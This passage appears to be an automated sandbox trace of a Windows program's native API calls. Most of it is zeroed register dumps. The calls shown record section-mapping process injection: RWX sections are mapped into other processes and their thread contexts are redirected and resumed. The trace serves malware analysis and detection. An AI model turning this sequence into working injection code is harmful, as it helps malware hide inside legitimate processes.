[315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 0x0 [0131.978] NtCreateSection (in: SectionHandle=0xde6ec, DesiredAccess=0xf001f, ObjectAttributes=0x0, MaximumSize=0xde6ac, SectionPageProtection=0x40, AllocationAttributes=0x8000000, FileHandle=0x0 | out: SectionHandle=0xde6ec*=0x1a8) returned 0x0 [0131.978] NtMapViewOfSection (in: SectionHandle=0x1a8, ProcessHandle=0xffffffff, BaseAddress=0xde6f4*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0xde6ac*=0x118200, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x40 | out: BaseAddress=0xde6f4*=0x75d0000, SectionOffset=0x0, ViewSize=0xde6ac*=0x119000) returned 0x0 [0131.986] NtMapViewOfSection (in: SectionHandle=0x1a8, ProcessHandle=0x1a0, BaseAddress=0xde6f0*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0xde6e8*=0x118200, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x40 | out: BaseAddress=0xde6f0*=0x2a60000, SectionOffset=0x0, ViewSize=0xde6e8*=0x119000) returned 0x0 [0132.011] NtUnmapViewOfSection (ProcessHandle=0xffffffff, BaseAddress=0x75d0000) returned 0x0 [0132.017] NtClose (Handle=0x1a8) returned 0x0 [0132.022] NtSetContextThread (ThreadHandle=0x1a4, Context=0xde72c*(ContextFlags=0x10007, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x0, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x0, SegGs=0x2b, SegFs=0x53, SegEs=0x2b, SegDs=0x2b, Edi=0x0, Esi=0x19ff14, Ebx=0x3ba000, Edx=0x0, Ecx=0x0, Eax=0x1, Ebp=0x19febc, Eip=0x2ae5717, SegCs=0x23, EFlags=0x202, Esp=0x19fea4, SegSs=0x2b, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 0x0 [0132.034] NtResumeThread (in: ThreadHandle=0x1a4, SuspendCount=0x0 | out: SuspendCount=0x0) returned 0x0 [0132.034] NtClose (Handle=0x1a0) returned 0x0 [0132.034] NtClose (Handle=0x1a4) returned 0x0 [0132.035] NtOpenProcess (in: ProcessHandle=0xdea70, DesiredAccess=0x438, ObjectAttributes=0xdea38*(Length=0x18, RootDirectory=0x0, ObjectName=0x0, Attributes=0x0, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), ClientId=0xdea50*(UniqueProcess=0x10f8, UniqueThread=0x0) | out: ProcessHandle=0xdea70*=0x1a4) returned 0x0 [0132.035] NtQueryInformationProcess (in: ProcessHandle=0x1a4, ProcessInformationClass=0x1a, ProcessInformation=0xdea60, ProcessInformationLength=0x4, ReturnLength=0x0 | out: ProcessInformation=0xdea60, ReturnLength=0x0) returned 0x0 [0132.035] NtQueryInformationProcess (in: ProcessHandle=0x1a4, ProcessInformationClass=0x0, ProcessInformation=0xde6e4, ProcessInformationLength=0x18, ReturnLength=0x0 | out: ProcessInformation=0xde6e4, ReturnLength=0x0) returned 0x0 [0132.035] NtReadVirtualMemory (in: ProcessHandle=0x1a4, BaseAddress=0x566000, Buffer=0xde9f8, NumberOfBytesToRead=0x20, NumberOfBytesRead=0x0 | out: Buffer=0xde9f8*, NumberOfBytesRead=0x0) returned 0x0 [0132.036] NtDelayExecution (Alertable=0, Interval=0xde6cc*=-50000000) returned 0x0 [0137.175] NtOpenThread (in: ThreadHandle=0xdea64, DesiredAccess=0x1a, ObjectAttributes=0xde6b0, ClientId=0xde6c8*(UniqueProcess=0x0, UniqueThread=0x10fc) | out: ThreadHandle=0xdea64*=0x1a0) returned 0x0 [0137.188] NtSuspendThread (in: ThreadHandle=0x1a0, PreviousSuspendCount=0x0 | out: PreviousSuspendCount=0x0) returned 0x0 [0137.188] NtMapViewOfSection (in: SectionHandle=0x184, ProcessHandle=0x1a4, BaseAddress=0xde704*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0xde700*=0x9c4000, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x4 | out: BaseAddress=0xde704*=0x2190000, SectionOffset=0x0, ViewSize=0xde700*=0x9c4000) returned 0x0 [0137.197] NtGetContextThread (in: ThreadHandle=0x1a0, Context=0xde72c | out: Context=0xde72c*(ContextFlags=0x10007, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x0, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x0, SegGs=0x2b, SegFs=0x53, SegEs=0x2b, SegDs=0x2b, Edi=0x0, Esi=0x19ff14, Ebx=0x566000, Edx=0x0, Ecx=0x0, Eax=0x1, Ebp=0x19febc, Eip=0x7561895c, SegCs=0x23, EFlags=0x202, Esp=0x19fea4, SegSs=0x2b, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 0x0 [0137.206] NtCreateSection (in: SectionHandle=0xde6ec, DesiredAccess=0xf001f, ObjectAttributes=0x0, MaximumSize=0xde6ac, SectionPageProtection=0x40, AllocationAttributes=0x8000000, FileHandle=0x0 | out: SectionHandle=0xde6ec*=0x1a8) returned 0x0 [0137.206] NtMapViewOfSection (in: SectionHandle=0x1a8, ProcessHandle=0xffffffff, BaseAddress=0xde6f4*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0xde6ac*=0xfd200, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x40 | out: BaseAddress=0xde6f4*=0x75d0000, SectionOffset=0x0, ViewSize=0xde6ac*=0xfe000) returned 0x0 [0137.211] NtMapViewOfSection (in: SectionHandle=0x1a8, ProcessHandle=0x1a4, BaseAddress=0xde6f0*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0xde6e8*=0xfd200, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x40 | out: BaseAddress=0xde6f0*=0x7a0000, SectionOffset=0x0, ViewSize=0xde6e8*=0xfe000) returned 0x0 [0137.229] NtUnmapViewOfSection (ProcessHandle=0xffffffff, BaseAddress=0x75d0000) returned 0x0 [0137.234] NtClose (Handle=0x1a8) returned 0x0 [0137.234] NtSetContextThread (ThreadHandle=0x1a0, Context=0xde72c*(ContextFlags=0x10007, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x0, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, 